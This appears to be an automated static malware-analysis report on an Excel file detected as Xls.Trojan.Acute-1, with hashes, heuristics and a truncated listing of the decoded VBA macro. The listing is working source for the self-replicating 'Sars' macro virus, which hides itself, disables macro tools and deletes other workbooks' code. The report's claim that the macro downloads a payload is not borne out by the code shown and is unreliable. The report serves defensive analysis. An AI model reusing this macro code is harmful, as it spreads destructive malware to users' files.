Xls.Trojan.Acute-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 53dc7915c2991272…

MALICIOUS

Office (OLE)

31.0 KB Created: 2004-07-23 07:05:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 2c61a3005cb13d1bdddb45b4208d9d66 SHA-1: 77ec59990ab5f6ad3d6eb410d5edece34d812afb SHA-256: 53dc7915c2991272ddc3ba28fb9a004db984ed9ce4e1d4438e00778f14ee22a6
120 Risk Score

Malware Insights

Xls.Trojan.Acute-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Acute-1. Static analysis revealed the presence of VBA macros, specifically an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The macro code itself appears to be designed to download and execute a secondary payload, although the exact details are truncated. The document body contains seemingly legitimate business terms, likely serving as a lure.

Heuristics 3

  • ClamAV: Xls.Trojan.Acute-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Acute-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4927 bytes
SHA-256: 540ce8cdb5bf4bc114f226e8736c5a7a65bce9872c31bf96e7298412721348e1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sars"
'   Sars virus!
'   Bandung, Indonesian
'   Tonk sok Sars nyieunan macro, lah...
'
Public Const Micro = "Sars"
Public Const Data0 = Micro & ".xls"
Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly."
Sub CkAgain()
Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14"
Dim bg          As Object
Dim po          As Object

On Error Resume Next

For Each j In Workbooks
Set bg = Workbooks(j.Name)
For Each boom In bg.VBProject.VBComponents
         If boom.Type <> 100 Then
            If boom.Name <> Micro Then
               bg.VBProject.VBComponents.Remove boom
            End If
         Else
            Set bck = boom.codemodule
            If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
         End If
     Next boom
     Next j
    
End Sub

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim Ct                  As Object
    Dim bg                  As Object
    Dim bgc                 As Object
    Dim bck                 As Object
    Dim xlsz                As Object
    Dim Ck                  As Boolean
    
On Error Resume Next
KillStart
With Application
     If WeekDay(Now) Mod 2 = 0 Then
        .Caption = "Sars is different on every computer system."
     Else
        .Caption = "Microsoft Excel for Buggie!"
     End If
     If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart"
     If Day(Date) = 20 Then
        MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro
        Date = Now + 1
     End If
     .ScreenUpdating = False
     .EnableCancelKey = xlDisabled
     If Day(Date) Mod 2 = 0 Then
        .OnTime Now + TimeValue("00:30:00"), "Sars.SarsWordArt"
     End If
     If Dir(.StartupPath & "\" & Data0) = "" Then
        ActiveWorkbook.SaveAs .StartupPath & "\" & Data0
     End If
     If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then
        Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1"
     End If
        Set bg = ActiveWorkbook
        .OnKey "%{F12}", "Sars.Cr"
        .OnKey "%{F8}", "Sars.Cr"
        .OnKey "%{F11}", "Sars.Cr"
        .CommandBars("Window").Controls("Unhide...").Enabled = False
        .CommandBars("Tools").Controls("Macro").Delete
     .OnSheetActivate = "Sars.xls!auto_Open"
     Workbooks(Data0).Windows.Item(1).Visible = False
     
     CkAgain
     If Dir(.Path & "\Wintlb32.dll") = "" Then
               Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll"
     End If
     
        For Each boom In bg.VBProject.VBComponents
             If boom.Type <> 100 Then
                If boom.Name <> Micro Then
                   bg.VBProject.VBComponents.Remove boom
                End If
             Else
                Set bck = boom.codemodule
                If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
             End If
         Next boom
     
     For Each xlsz In bg.VBProject.VBComponents
         If xlsz.Name = Micro Then Ck = True: Exit For
     Next xlsz
     
     If Ck = False Then
        Set Ct = bg.VBProject.VBComponents
               Ct.Import .Path & "\Wintlb32.dll"
               Kill .Path & "\Wintlb32.dll"
               Workbooks(Data0).Save
               If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save
     End If
     
End With
End Sub
Sub Cr():
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.